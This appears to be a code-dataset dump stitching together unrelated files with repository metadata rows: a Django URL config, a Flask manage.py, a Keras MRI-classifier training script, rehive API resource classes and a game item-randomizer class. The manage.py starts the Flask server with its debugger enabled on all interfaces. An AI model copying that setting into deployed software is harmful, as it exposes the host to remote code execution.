    url(r"^forum/", include('spirit.urls')),
    url(r"^admin/", include(admin.site.urls)),
    url(r"^account/", include("account.urls")),
    url(r"^profile/", include("profiles.urls", namespace="profiles")),
    url(r"^polls/", include("polls.urls", namespace="polls")),
    url(r"^readings/", include("readings.urls", namespace="readings")),
    url(r"^about/$", views.about, name="about"),
    url(r'^chat/', include('djangoChat.urls', namespace="djangoChat")),
)
# Serve user-uploaded media through Django (development convenience only).
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 35.833333 | 76 | 0.696512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.269767 |
2cba7250d153e2ae0ada8d707ceeee8f346b2d8c | 335 | py | Python | mox/manage.py | abouzek/mox | 35f1836a9aa9a320d0df8da77e3ebacaa1eb15c4 | [
"MIT"
] | null | null | null | mox/manage.py | abouzek/mox | 35f1836a9aa9a320d0df8da77e3ebacaa1eb15c4 | [
"MIT"
] | null | null | null | mox/manage.py | abouzek/mox | 35f1836a9aa9a320d0df8da77e3ebacaa1eb15c4 | [
"MIT"
] | null | null | null | import os, sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from flask.ext.script import Manager, Server
from app import app
# Flask-Script entry point: `python manage.py runserver` starts a
# debug-enabled, auto-reloading development server on all interfaces.
manager = Manager(app)
manager.add_command("runserver", Server(
    use_debugger = True,
    use_reloader = True,
    host = '0.0.0.0')
)
if __name__ == "__main__":
    manager.run()
| 19.705882 | 79 | 0.713433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.101493 |
2cc0826258661c4861e70f37cdbf8acd649ca6e6 | 5,035 | py | Python | train.py | sremedios/nifti_image_generator | ffd476fa3d12a2cfb12250d903efd2277dc3426b | [
"MIT"
] | 6 | 2019-07-11T18:00:19.000Z | 2022-01-27T22:50:57.000Z | train.py | sremedios/nifti_image_generator | ffd476fa3d12a2cfb12250d903efd2277dc3426b | [
"MIT"
] | 1 | 2019-02-26T14:20:32.000Z | 2019-02-26T14:20:32.000Z | train.py | sremedios/nifti_image_generator | ffd476fa3d12a2cfb12250d903efd2277dc3426b | [
"MIT"
] | 7 | 2019-01-07T19:30:51.000Z | 2021-05-17T19:23:23.000Z | '''
Samuel Remedios
NIH CC CNRM
Train PhiNet to classify MRI modalities
'''
import os
import json
from keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, EarlyStopping
from keras import backend as K
from keras.models import model_from_json
from models.phinet import phinet, phinet_2D
from models.multi_gpu import ModelMGPU
from utils.nifti_image import NIfTIImageDataGenerator
from utils.augmentations import *
from utils.utils import parse_args, now
os.environ['FSLOUTPUTTYPE'] = 'NIFTI_GZ'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
if __name__ == '__main__':
    ############### DIRECTORIES ###############
    results = parse_args("train")
    # GPU selection: default GPU 0; -1 means multi-GPU (count hard-coded to
    # 3 - presumably machine-specific, TODO confirm); otherwise pin the ID.
    NUM_GPUS = 1
    if results.GPUID == None:
        os.environ["CUDA_VISIBLE_DEVICES"] = "0"
    elif results.GPUID == -1:
        NUM_GPUS = 3
    else:
        os.environ["CUDA_VISIBLE_DEVICES"] = str(results.GPUID)
    TRAIN_DIR = os.path.abspath(os.path.expanduser(results.TRAIN_DIR))
    VAL_DIR = os.path.abspath(os.path.expanduser(results.VAL_DIR))
    classes = results.classes.replace(" ", "").split(',')
    WEIGHT_DIR = os.path.abspath(os.path.expanduser(results.OUT_DIR))
    MODEL_NAME = "phinet_model_" + "-".join(classes)
    MODEL_PATH = os.path.join(WEIGHT_DIR, MODEL_NAME+".json")
    SAMPLE_AUG_PATH = os.path.join("data", "augmented_slices")
    AUG_FILE_PREFIX = "augmented_file"
    for d in [WEIGHT_DIR, SAMPLE_AUG_PATH]:
        if not os.path.exists(d):
            os.makedirs(d)
    # Hard-coded patch geometry; its length (2 vs 3) selects the 2D or 3D
    # model below.
    patch_size = (45, 45)
    num_patches = 100
    ############### MODEL SELECTION ###############
    '''
    if results.model:
        with open(results.model) as json_data:
            model = model_from_json(json.load(json_data))
        model.load_weights(results.weights)
    '''
    LR = 1e-5
    if len(patch_size) == 2:
        model = phinet_2D(model_path=MODEL_PATH,
                          n_classes=len(classes),
                          learning_rate=LR,
                          num_channels=1,
                          num_gpus=NUM_GPUS,
                          verbose=0,)
    elif len(patch_size) == 3:
        model = phinet(model_path=MODEL_PATH,
                       n_classes=len(classes),
                       learning_rate=LR,
                       num_channels=1,
                       num_gpus=NUM_GPUS,
                       verbose=0,)
    # NOTE(review): any other patch_size length leaves `model` undefined and
    # fails later with a NameError.
    if results.weights:
        model.load_weights(results.weights)
    ############### DATA IMPORT ###############
    # augmentations occur in the order they appear
    train_augmentations = {
        rotate_3D: {"max_angle": 30,
                    "direction_length": 3},
        get_patch_2D: {"patch_size": patch_size,
                       "num_patches": num_patches,
                       "transpose_chance": 0.5},
    }
    # Validation gets deterministic patching (no random transposes).
    val_augmentations = {
        get_patch_2D: {"patch_size": patch_size,
                       "num_patches": num_patches,
                       "transpose_chance": 0},
    }
    # Hard-coded dataset sizes - presumably specific to the authors' data;
    # TODO confirm before reuse.
    num_files = 2087
    num_val_files = 600
    batch_size = 16
    params = {
        # 'target_size': (256, 256, 256),
        'target_size': patch_size,
        'batch_size': batch_size,
        'class_mode': 'categorical',
        'num_patches': num_patches,
        # 'axial_slice': 2,
        #'save_to_dir': SAMPLE_AUG_PATH,
        #'save_prefix': AUG_FILE_PREFIX,
    }
    train_params = {'augmentations': train_augmentations}
    val_params = {'augmentations': val_augmentations}
    train_datagen = NIfTIImageDataGenerator()
    test_datagen = NIfTIImageDataGenerator()
    train_generator = train_datagen.flow_from_directory(
        TRAIN_DIR, **params, **train_params)
    validation_generator = test_datagen.flow_from_directory(
        VAL_DIR, **params, **val_params)
    ############### CALLBACKS ###############
    callbacks_list = []
    # Checkpoint: keep only weights that improve validation accuracy.
    WEIGHT_NAME = MODEL_NAME.replace("model", "weights") + "_" +\
        now()+"-epoch-{epoch:04d}-val_acc-{val_acc:.4f}.hdf5"
    fpath = os.path.join(WEIGHT_DIR, WEIGHT_NAME)
    checkpoint = ModelCheckpoint(fpath,
                                 monitor='val_acc',
                                 verbose=1,
                                 save_best_only=True,
                                 mode='max',
                                 save_weights_only=True)
    callbacks_list.append(checkpoint)
    # Early Stopping, used to quantify convergence
    es = EarlyStopping(monitor='val_acc', min_delta=1e-4, patience=20)
    callbacks_list.append(es)
    ############### TRAINING ###############
    # epochs is effectively unbounded; EarlyStopping ends the run.
    model.fit_generator(train_generator,
                        validation_data=validation_generator,
                        steps_per_epoch=num_files//batch_size, # total number of images
                        epochs=100000,
                        validation_steps=num_val_files//batch_size, # total number val images
                        callbacks=callbacks_list)
    # TODO: ensure that the classes learned can be predicted upon
    K.clear_session()
| 32.275641 | 94 | 0.58431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,285 | 0.255214 |
2cc35cd363ef4cfec9425fc3d0c72127f474a4df | 960 | py | Python | rehive/api/resources/company_resources.py | rehive/rehive-python | 72cf7208db8e99711ea8568073577be3459c79fc | [
"MIT"
] | 8 | 2017-06-23T13:33:59.000Z | 2022-01-17T10:55:23.000Z | rehive/api/resources/company_resources.py | rehive/rehive-python | 72cf7208db8e99711ea8568073577be3459c79fc | [
"MIT"
] | 59 | 2017-06-23T13:21:01.000Z | 2022-01-10T17:41:22.000Z | rehive/api/resources/company_resources.py | rehive/rehive-python | 72cf7208db8e99711ea8568073577be3459c79fc | [
"MIT"
] | 3 | 2017-10-12T18:43:29.000Z | 2018-12-26T09:38:42.000Z | from .base_resources import Resource, ResourceCollection, ResourceList
class APICompany(Resource, ResourceCollection):
def __init__(self, client, endpoint='', filters=None):
self.resources = (
APIBanks,
APICurrencies,
APIBankAccount,
APIBankAccounts
)
super(APICompany, self).__init__(client, endpoint, filters)
self.create_resources(self.resources)
@classmethod
def get_resource_name(cls):
return 'company'
class APIBanks(ResourceList):
@classmethod
def get_resource_name(cls):
return 'bank'
class APICurrencies(ResourceList):
@classmethod
def get_resource_name(cls):
return 'currencies'
class APIBankAccount(Resource):
@classmethod
def get_resource_name(cls):
return 'bank-account'
class APIBankAccounts(Resource):
@classmethod
def get_resource_name(cls):
return 'bank-accounts'
| 20.869565 | 70 | 0.667708 | 874 | 0.910417 | 0 | 0 | 356 | 0.370833 | 0 | 0 | 58 | 0.060417 |
2cc3e1fe2b2d86ca07ffd45b8265bde07b843fe1 | 325,343 | py | Python | src/randomizer/randomizer/classes.py | DontBaguMe/IoGR | 3ab69c7a47133b82517aced5db5ece8f15d5727d | [
"Unlicense"
] | 12 | 2019-05-06T12:31:06.000Z | 2020-07-21T19:24:44.000Z | src/randomizer/randomizer/classes.py | DontBaguMe/IoGR | 3ab69c7a47133b82517aced5db5ece8f15d5727d | [
"Unlicense"
] | 2 | 2020-06-11T22:12:15.000Z | 2021-10-20T22:53:42.000Z | src/randomizer/randomizer/classes.py | DontBaguMe/IoGR | 3ab69c7a47133b82517aced5db5ece8f15d5727d | [
"Unlicense"
] | 7 | 2019-08-11T00:06:03.000Z | 2021-06-13T04:19:19.000Z | import copy
import time
from datetime import datetime
import binascii
import graphviz
import random
from .models.enums.start_location import StartLocation
from .models.enums.goal import Goal
from .models.enums.statue_req import StatueReq
from .models.enums.entrance_shuffle import EntranceShuffle
from .models.enums.enemizer import Enemizer
from .models.enums.logic import Logic
from .models.randomizer_data import RandomizerData
MAX_INVENTORY = 15  # Hard cap on simultaneously-held inventory items (see progression_list)
PROGRESS_ADJ = [1.5, 1.25, 1, 0.75]  # Required items are more likely to be placed in easier modes
MAX_CYCLES = 100  # presumably a safety limit on solver iterations - TODO confirm (not used in this chunk)
INACCESSIBLE = 9999  # Sentinel region ID meaning "cannot be reached" (see random_fill)
class World:
    # Assigns item to location
    def fill_item(self, item, location=-1,test=False,override_restrictions=False,print_log=False):
        """Place `item` into `location`.

        Returns False if no location is given, the location is full, or the
        item is restricted there (unless `override_restrictions`).  With
        `test=True` only feasibility is reported; nothing is mutated.  On a
        real placement the pool count drops, the location is marked filled,
        and - if the location's region is already accessible - the item is
        immediately treated as collected and the location closed.
        """
        if location == -1:
            return False
        elif self.item_locations[location][2]:
            if print_log:
                print("ERROR: Attempted to place an item in a full location")
            return False
        elif item in self.item_locations[location][4] and not override_restrictions:
            if print_log:
                print("ERROR: Attempt to place item in a restricted location:",[self.item_pool[item][3],self.item_locations[location][9]])
            return False
        elif test:
            return True
        # Commit the placement: one fewer copy in the pool, location filled.
        self.item_pool[item][0] -= 1
        self.item_locations[location][2] = True
        self.item_locations[location][3] = item
        if print_log:
            print("  ",self.item_pool[item][3],"->",self.item_locations[location][9])
        if self.is_accessible(self.item_locations[location][0]):
            # Region already reached: item counts as collected right away,
            # and the location is no longer "open" for future placement.
            self.items_collected.append(item)
            if location in self.open_locations[0]:
                self.open_locations[0].remove(location)
            elif location in self.open_locations[1]:
                self.open_locations[1].remove(location)
        self.placement_log.append([item, location])
        #if self.item_locations[location][1] == 2:
        #    self.check_logic()
        return True
    # Removes an assigned item and returns it to item pool
    def unfill_item(self, location=-1, print_log=False):
        """Undo a placement at `location`; return the removed item ID.

        Returns -1 when no location is given or the location is empty.
        Reverses fill_item's bookkeeping: pool count, collected list,
        open-location lists, and the placement log entry.
        """
        if location == -1:
            return -1
        elif not self.item_locations[location][2]:
            return -1
        item = self.item_locations[location][3]
        self.item_locations[location][2] = False
        self.item_locations[location][3] = 0
        self.item_pool[item][0] += 1
        if print_log:
            print("  ",self.item_pool[item][3],"<-",self.item_locations[location][9],"removed")
        if self.is_accessible(self.item_locations[location][0]):
            # Region was reachable, so the item had been auto-collected.
            if item in self.items_collected:
                self.items_collected.remove(item)
            type = self.item_pool[item][1]
            if location not in self.open_locations[type-1]:
                self.open_locations[type-1].append(location)
        # NOTE(review): removing from placement_log while iterating it skips
        # the element after each removal; harmless if a location appears at
        # most once in the log - confirm that invariant holds.
        for x in self.placement_log:
            if x[1] == location:
                self.placement_log.remove(x)
        return item
# Converts item pool into list of unique items, returns list
def list_item_pool(self, type=0, items=[], progress_type=0):
item_list = []
for x in self.item_pool:
if not items or x in items:
if not type or type == self.item_pool[x][1]:
if not progress_type or progress_type == self.item_pool[x][5]:
i = 0
while i < self.item_pool[x][0]:
item_list.append(x)
i += 1
return item_list
# Returns a list of unfilled item locations
def list_item_locations(self):
locations = []
for x in self.item_locations:
locations.append(x)
return locations
# Returns list of graph edges
def list_logic(self):
edges = []
for x in self.logic:
edges.append(x)
return edges
# Checks if one list is contained inside another list
def is_sublist(self, list, sublist):
if sublist == []:
return True
elif sublist == list:
return True
elif len(sublist) > len(list):
return False
l = list[:]
for x in sublist:
if x in l:
l.remove(x)
else:
return False
return True
# Returns lists of accessible item, ability, and statue locations
def find_open_locations(self):
# Accessible open location for items, abilities, and Mystic Statues
locations = [[], [], [], []]
for x in self.item_locations:
region = self.item_locations[x][0]
type = self.item_locations[x][1]
if self.graph[region][0] and not self.item_locations[x][2]:
locations[type - 1].append(x)
self.open_locations[0] = locations[0][:]
self.open_locations[1] = locations[1][:]
return locations
# Returns graph node of an item location
def location_node(self, location_id=-1,print_log=False):
if location_id not in self.item_locations:
if print_log:
print("ERROR: Invalid item location", location_id)
return False
else:
return self.item_locations[location_id][0]
# Returns whether an item location is already filled with an item
def is_filled(self, location_id=-1,print_log=False):
if location_id not in self.item_locations:
if print_log:
print("ERROR: Invalid item location", location_id)
return False
else:
return self.item_locations[location_id][2]
# Zeroes out accessible flags for all world regions
def is_accessible(self, node_id=-1):
if node_id not in self.graph:
return False
elif self.graph[node_id][0]:
return True
else:
return False
# Zeroes out accessible flags for all world regions
def unsolve(self,reset_graph=False):
for x in self.graph:
self.graph[x][0] = False
if reset_graph:
self.graph[x][4] = 0
self.graph[x][8].clear()
self.graph[x][9].clear()
self.graph[x][10] = self.graph[x][1][:]
for x in self.logic:
if self.logic[x][0] == 1:
self.logic[x][0] = 0
return True
# Resets collected items and other traversal data
def reset_progress(self,reset_graph=False):
self.visited.clear()
self.items_collected.clear()
self.item_destinations.clear()
self.open_locations = [[],[]]
self.open_edges = []
self.unsolve(reset_graph)
return True
    # Finds every accessible node in the graph
    # Collects items into self.items_collected, edges into self.open_edges
    def traverse(self,to_visit=[],test=False,print_log=False):
        """BFS/DFS hybrid over the world graph from `to_visit` (node 0 by
        default).  Visits nodes, collects their items, and whenever the
        frontier empties re-checks logic edges to see whether collected
        items unlock new destinations.  Returns [visited_nodes, new_items].

        NOTE(review): `to_visit=[]` is a mutable default; it happens to be
        safe only because the while-loop drains the list before returning -
        consider a None sentinel.
        """
        if print_log:
            print("  Beginning traversal...")
        visited = []
        new_items = []
        if not to_visit:
            to_visit.append(0)
        while to_visit:
            node = to_visit.pop(0)
            visited.append(node)
            if print_log:
                print("  Visiting:",self.graph[node][5])
            # If we haven't been here yet...
            if not self.graph[node][0]:
                # Get the newly-accessible items and record open item/ability locations
                new_items += self.visit_node(node,test,print_log)
                # Queue up newly-accessible places to visit
                for x in self.graph[node][10]:
                    if x != node and not self.is_accessible(x) and x not in to_visit+visited:
                        to_visit.insert(0,x)
                        if print_log:
                            print("   -Discovered:",self.graph[x][5])
            # If we've run out of places to visit, check if logic has opened up any new nodes
            if not to_visit:
                open_edges = self.get_open_edges(visited)
                bad_edges = []
                if print_log:
                    print("  Ran out of places - updating logic:")
                for edge in open_edges:
                    dest = self.logic[edge][2]
                    if self.check_edge(edge,[],False) and dest not in to_visit:
                        # Edge satisfied: mark it open and queue its destination.
                        self.logic[edge][0] = 1
                        to_visit.append(dest)
                        if print_log:
                            print("   -Discovered:",self.graph[dest][5])
                    else:
                        bad_edges.append(edge)
                if not test:
                    # Remember the still-unsatisfied edges for later passes.
                    self.open_edges = bad_edges
        return [visited,new_items]
# Return list of logic edges that originate in an accessible node and end in an inaccessible node
def get_open_edges(self,nodes=[]):
test_edges = self.open_edges[:]
open_edges = []
for x in nodes:
if not self.is_accessible(x):
test_edges += self.graph[x][12]
for edge in test_edges:
origin = self.logic[edge][1]
dest = self.logic[edge][2]
if self.logic[edge][0] >= 0 and not self.is_accessible(dest) and dest not in nodes:
open_edges.append(edge)
return open_edges
# Visit a node, update graph info, return new items collected
def visit_node(self,node,test=False,print_log=False):
if not test and not self.graph[node][0]:
self.graph[node][0] = True
self.visited.append(node)
self.item_destinations += self.graph[node][6]
self.open_edges += self.graph[node][12]
return self.collect_items(node,test,print_log)
# Collect all items in given node
def collect_items(self,node=-1,test=False,print_log=False):
if node not in self.graph:
return False
items_found = []
for location in self.graph[node][11]:
if self.item_locations[location][2]:
items_found.append(self.item_locations[location][3])
if not test:
self.items_collected.append(self.item_locations[location][3])
if print_log:
print(" -Collected:",self.item_pool[self.item_locations[location][3]][3])
elif self.item_locations[location][1] == 1 and not test:
self.open_locations[0].append(location)
if print_log:
print(" -Discovered:",self.item_locations[location][9])
elif self.item_locations[location][1] == 2 and not test:
self.open_locations[1].append(location)
if print_log:
print(" -Discovered:",self.item_locations[location][9])
return items_found
# Returns full list of accessible locations
def accessible_locations(self, item_locations):
accessible = []
for x in item_locations:
region = self.item_locations[x][0]
if self.is_accessible(region):
accessible.append(x)
return accessible
# Returns full list of inaccessible locations
def inaccessible_locations(self, item_locations):
inaccessible = []
for x in item_locations:
region = self.item_locations[x][0]
if not self.is_accessible(region):
inaccessible.append(x)
return inaccessible
# Fill a list of items randomly in a list of locations
def random_fill(self, items=[], item_locations=[], accessible=True, print_log=False):
if not items:
return True
elif not item_locations:
return False
to_place = items[:]
to_fill = item_locations[:]
while to_place:
item = to_place.pop(0)
item_type = self.item_pool[item][1]
placed = False
i = 0
for dest in to_fill:
if not placed:
region = self.item_locations[dest][0]
location_type = self.item_locations[dest][1]
filled = self.item_locations[dest][2]
restrictions = self.item_locations[dest][4]
if not filled and item_type == location_type and item not in restrictions:
if not accessible or region != INACCESSIBLE:
if self.fill_item(item, dest, False, False, print_log):
to_fill.remove(dest)
placed = True
return True
    # Place list of items into random accessible locations
    def forward_fill(self, items=[], item_locations=[], test=False, override_restrictions=False, print_log=False):
        """Place every item into an unfilled, accessible location of the
        matching type.  Locations that reject an item are quarantined and
        retried after the next successful placement.  Returns False when an
        item cannot be placed anywhere.

        NOTE(review): on a rejected location this appends `item` back onto
        the CALLER'S `items` list (not `to_place`) - confirm that side
        effect is intended.  `filled_locations` is accumulated but never
        used or returned.
        """
        if not items:
            return True
        elif not item_locations:
            if print_log:
                print("ERROR: No item locations given")
            return False
        to_place = items[:]
        # Bucket candidate locations by type (1-3): unfilled + accessible only.
        to_fill =[[],[],[]]
        for loc in item_locations:
            if not self.item_locations[loc][2] and self.is_accessible(self.item_locations[loc][0]):
                loc_type = self.item_locations[loc][1]
                to_fill[loc_type-1].append(loc)
        quarantine = [[],[],[]]
        filled_locations = []
        while to_place:
            item = to_place.pop(0)
            item_type = self.item_pool[item][1]
            filled = False
            while not filled and to_fill[item_type-1]:
                location = to_fill[item_type-1].pop(0)
                if self.fill_item(item,location,test,override_restrictions,print_log):
                    filled = True
                    filled_locations.append(location)
                    # Give previously-rejected locations another chance.
                    to_fill[item_type-1] += quarantine[item_type-1]
                else:
                    quarantine[item_type-1].append(location)
                    items.append(item)
            if not filled:
                if print_log:
                    print("ERROR: Not enough room to place items")
                return False
        return True
# Convert a prerequisite to a list of items needed to fulfill it
def items_needed(self, edge=0):
if not edge:
return []
prereq = []
for req in self.logic[edge][4]:
item = req[0]
ct = req[1]
i = 0
while i < ct:
prereq.append(item)
i += 1
if not self.items_collected:
return prereq
prereq_new = []
items_new = self.items_collected[:]
while prereq:
x = prereq.pop(0)
if x in items_new:
items_new.remove(x)
else:
prereq_new.append(x)
return prereq_new
    # Returns list of item combinations that grant progression
    # Returns progression list in the following categories: [[available],[not enough room],[too many inventory items]]
    def progression_list(self,open_edges=[]):
        """Classify the prerequisite item sets of every open edge.

        For each open edge whose prerequisites still exist in the pool:
        - bucket 1 if there is not enough room to place them,
        - bucket 2 if taking them would exceed MAX_INVENTORY,
        - bucket 0 if they are usable now (or only Dark-Space-gated, used
          as a fallback when nothing else qualifies).
        """
        if not open_edges:
            open_edges = self.get_open_edges()
        all_items = self.list_item_pool(1)
        #open_locations = self.find_open_locations()
        # NOTE(review): this local is assigned but never read below.
        open_locations = len(self.open_locations[0])
        prereq_list = [[],[],[]]   # [[available],[not enough room],[too many inventory items]]
        ds_list = []
        for edge in open_edges:
            prereq = self.items_needed(edge)
            if prereq and prereq not in prereq_list[0] and self.is_sublist(all_items, prereq):
                # Dry-run placement (test=True) to see if the items fit.
                if prereq not in prereq_list[1] and not self.forward_fill(prereq,self.open_locations[0],True,self.logic_mode == "Chaos"):
                    prereq_list[1].append(prereq)
                elif prereq not in prereq_list[2]:
                    dest = self.logic[edge][2]
                    # Simulate traversing through the edge's destination and
                    # compute the resulting inventory load.
                    traverse_result = self.traverse([dest],True)
                    new_nodes = traverse_result[0]
                    start_items_temp = self.items_collected[:] + prereq + traverse_result[1]
                    item_destinations_temp = self.item_destinations[:]
                    for x in new_nodes:
                        item_destinations_temp += self.graph[x][6]
                    inv_temp = self.get_inventory(start_items_temp,item_destinations_temp)
                    if len(inv_temp) <= MAX_INVENTORY:
                        if self.entrance_shuffle == "None" or self.check_ds_access(dest,False,start_items_temp):
                            prereq_list[0].append(prereq)
                        else:
                            # Reachable but lacks Dark Space access; fallback.
                            ds_list.append(prereq)
                    else:
                        prereq_list[2].append(prereq)
        if prereq_list == [[],[],[]]:
            prereq_list[0] += ds_list
        return prereq_list
# Find and clear non-progression item to make room for progression item
def make_room(self, progression_result, print_log=False):
# For inventory bottlenecks, remove one inventory item and try again
if not progression_result[1] and progression_result[2]:
return self.remove_nonprog(1,0,True,print_log)
success = False
for node in self.visited:
if not success:
for x in self.graph[node][11]:
if self.is_filled(x) and self.item_pool[self.item_locations[x][3]][5]>1:
if self.unfill_item(x,print_log):
success = True
return success
#### THIS IS OLD, OBSELETE CODE
# non_prog_locations = [[],[]]
# open_locations = len(self.open_locations[0])
# open_abilities = len(self.open_locations[1])
# unfilled = []
# min_prereqs = []
# min_item_ct = 0
# min_ability_ct = 0
# progression_list = progression_result[1][:]
# while progression_list:
# prereq = progression_list.pop(0)
# items_needed = -open_locations
# abilities_needed = -open_abilities
# for x in prereq:
# if self.item_pool[x][1] == 1:
# items_needed += 1
# elif self.item_pool[x][1] == 2:
# abilities_needed += 1
# items_needed = max(0,items_needed)
# abilities_needed = max(0,abilities_needed)
# if not min_prereqs or min_item_ct+min_ability_ct > items_needed + abilities_needed:
# min_prereqs = [prereq]
# min_item_ct = items_needed
# min_ability_ct = abilities_needed
# elif min_prereqs and min_item_ct == items_needed and min_ability_ct == abilities_needed:
# min_prereqs.append(prereq)
#
# if not self.remove_nonprog(min_item_ct,min_ability_ct,False,print_log):
# if print_log:
# print("ERROR: Could not make room")
# return False
#
# return min_prereqs
# Remove an accessible non-progression item to make room for a progression item
def remove_nonprog(self,item_ct=0,ability_ct=0,inv=False,print_log=False):
junk_locations = [[],[]]
quest_locations = [[],[]]
for location in self.item_locations:
if self.item_locations[location][2] and self.is_accessible(self.item_locations[location][0]):
item = self.item_locations[location][3]
type = self.item_pool[item][1]
prog_type = self.item_pool[item][5]
inv_type = self.item_pool[item][4]
if type <= 2:
if prog_type == 2:
quest_locations[type-1].append(location)
elif prog_type == 3:
if not inv or inv_type:
junk_locations[type-1].append(location)
random.shuffle(junk_locations[0])
random.shuffle(junk_locations[1])
random.shuffle(quest_locations[0])
random.shuffle(quest_locations[1])
quest = False
type = 1
locations = junk_locations[0]
count = item_ct
done = False
items_removed = []
while not done:
if not count and type == 1:
type == 2
count = ability_ct
quest = False
locations = junk_locations[1]
if not count and type == 2:
done = True
else:
if not locations and not quest:
quest = True
locations = quest_locations[type-1]
if not locations:
if print_log:
print("ERROR: Not enough room")
return False
location = locations.pop(0)
items_removed.append(self.unfill_item(location))
count -= 1
if print_log:
print(" Removed these items:",items_removed)
return items_removed
# Converts a progression list into a normalized Monte Carlo distribution
def monte_carlo(self, progression_ls=[], start_items=[]):
if not progression_ls:
return []
progression = progression_ls[:]
items = self.list_item_pool(1)
abilities = self.list_item_pool(2)
all_items = items + abilities
sum_items = len(items)
sum_abilities = len(abilities)
probability = []
monte_carlo = []
sum_prob = 0
sum_edges = 0
probabilities = []
idx = 0
while progression:
current_prereq = progression.pop(0)
prereqs = current_prereq[:]
probability = 1.0
i = 0
j = 0
while prereqs:
item = prereqs.pop(0)
if item in all_items:
if self.item_pool[item][1] == 1:
probability *= float(self.item_pool[item][0]) / float((sum_items - i))
i += 1
elif self.item_pool[item][1] == 2:
probability *= float(self.item_pool[item][0]) / float((sum_abilities - j))
j += 1
if item in self.required_items:
probability *= PROGRESS_ADJ[self.difficulty]
probabilities.append([probability, idx])
sum_prob += probability
sum_edges += 1
idx += 1
prob_adj = 100.0 / sum_prob
rolling_sum = 0.0
for x in probabilities:
x[0] = x[0] * prob_adj + rolling_sum
rolling_sum = x[0]
# print probabilities
return probabilities
# Returns a list of map lists, by boss
def get_maps(self):
maps = [[], [], [], [], [], [], []]
for map in self.maps:
boss = self.maps[map][1]
maps[boss].append(map)
maps.pop(0)
return maps
# Randomize map-clearing rewards
def map_rewards(self):
maps = self.get_maps()
# print maps
for area in maps:
random.shuffle(area)
boss_rewards = 4
# Total rewards by type, by level (HP/STR/DEF)
if "Z3 Mode" in self.variant:
rewards_tier1 = [1] * 6 # Expert: 6 HP
rewards_tier2 = [1] * 6 # Advanced: 12 HP
rewards_tier3 = [1] * 6 # Intermediate: 18 HP
rewards_tier4 = [] # Beginner: 18 HP
else: # Remove all HP upgrades
rewards_tier1 = [1,1,1,1,1,1] # Expert: 6/0/0
rewards_tier2 = [1,1,2,2,3,3] # Advanced: 8/2/2
rewards_tier3 = [1,1,2,2,3,3] # Intermediate: 10/4/4
rewards_tier4 = [2,2,2,3,3,3] # Beginner: 10/7/7
# Remove HP upgrades in OHKO
if "OHKO" in self.variant:
for n, i in enumerate(rewards_tier1):
if i == 1:
rewards_tier1[n] = 0
for n, i in enumerate(rewards_tier2):
if i == 1:
rewards_tier2[n] = 0
for n, i in enumerate(rewards_tier3):
if i == 1:
rewards_tier3[n] = 0
for n, i in enumerate(rewards_tier4):
if i == 1:
rewards_tier4[n] = 0
random.shuffle(rewards_tier1)
random.shuffle(rewards_tier2)
random.shuffle(rewards_tier3)
random.shuffle(rewards_tier4)
# Allocate rewards to maps
for area in maps:
random.shuffle(area)
self.maps[area[0]][2] = [rewards_tier1.pop(0),1]
self.maps[area[1]][2] = [rewards_tier2.pop(0),2]
self.maps[area[2]][2] = [rewards_tier3.pop(0),3]
if rewards_tier4:
self.maps[area[3]][2] = [rewards_tier4.pop(0),4]
else:
self.maps[area[3]][2] = [0,4]
# Place Mystic Statues in World
def fill_statues(self, locations=[148, 149, 150, 151, 152, 153]):
if self.statue_req == StatueReq.PLAYER_CHOICE.value:
return self.random_fill([106]*6, locations)
return self.random_fill([100, 101, 102, 103, 104, 105], locations)
    def lock_dark_spaces(self,print_log=False):
        """Guarantee a Dark Space for every node that needs Freedan.

        For each non-restricted logic edge that requires Freedan access
        ([3] truthy), ensure at least one Dark Space reachable from the
        edge's origin node is locked (unfillable), so that an ability can
        never be placed there. Returns False if any such node has no Dark
        Space access at all.
        """
        nodes = []
        for edge in self.logic:
            if self.logic[edge][0] >-1 and self.logic[edge][3]:
                nodes.append(self.logic[edge][1])
        for node in nodes:
            if not self.check_ds_access(node, True):
                if print_log:
                    print("ERROR: No Dark Space could be accessed ")
                return False
            else:
                # Prefer a DS that is already locked ([2] True) and empty ([3] falsy).
                found_locked_ds = False
                nodes_to_check = self.graph[node][9][:]
                random.shuffle(nodes_to_check)
                while not found_locked_ds and nodes_to_check:
                    ds_node = nodes_to_check.pop(0)
                    ds_loc = self.ds_locations[self.ds_nodes.index(ds_node)]
                    if self.item_locations[ds_loc][2] and not self.item_locations[ds_loc][3]:
                        found_locked_ds = True
                        #if print_log:
                        #    print("   -Found:",self.item_locations[ds_loc][9])
                # None locked yet: lock the last DS examined, unfilling it
                # first if it already holds an item.
                # NOTE(review): ds_loc here is the variable left over from the
                # loop above; assumes graph[node][9] was non-empty (implied by
                # the successful check_ds_access) -- confirm.
                if not found_locked_ds:
                    self.item_locations[ds_loc][2] = True
                    if self.item_locations[ds_loc][3]:
                        self.unfill_item(ds_loc)
                    if print_log:
                        print("   -Locked:",self.item_locations[ds_loc][9])
        return True
# Determine an exit's direction (e.g. outside to inside)
def is_exit_coupled(self,exit,print_log=False):
if exit not in self.exits:
return False
if self.exits[exit][0]:
sister_exit = self.exits[exit][0]
if self.exits[sister_exit][0] == exit:
return sister_exit
else:
if print_log:
print("WARNING: Exits linked incorrectly",exit,sister_exit)
return sister_exit
return False
# Determine an exit's direction (e.g. outside to inside)
def exit_direction(self,exit):
if exit not in self.exits:
return False
origin = self.exits[exit][3]
dest = self.exits[exit][4]
if self.graph[origin][2] == 2:
o_type = 2
else:
o_type = 1
if self.graph[dest][2] == 2:
d_type = 2
else:
d_type = 1
# return (o_type,d_type)
if o_type == 2 and d_type == 2:
return (1,1)
else:
return d_type
# Get lists of unmatched origin/destination exits
# def get_remaining_exits(self):
# exits_remaining = [[],[]]
# for exit in self.exits:
# if self.exits[exit][1] == -1:
# exits_remaining[0].append(exit)
# if self.exits[exit][2] == -1:
# exits_remaining[1].append(exit)
# return exits_remaining
    # Link one exit to another
    def link_exits(self, origin_exit, dest_exit, print_log=False, check_connections=True, update_graph=True):
        """Link *origin_exit* to *dest_exit* and record it in the exit log.

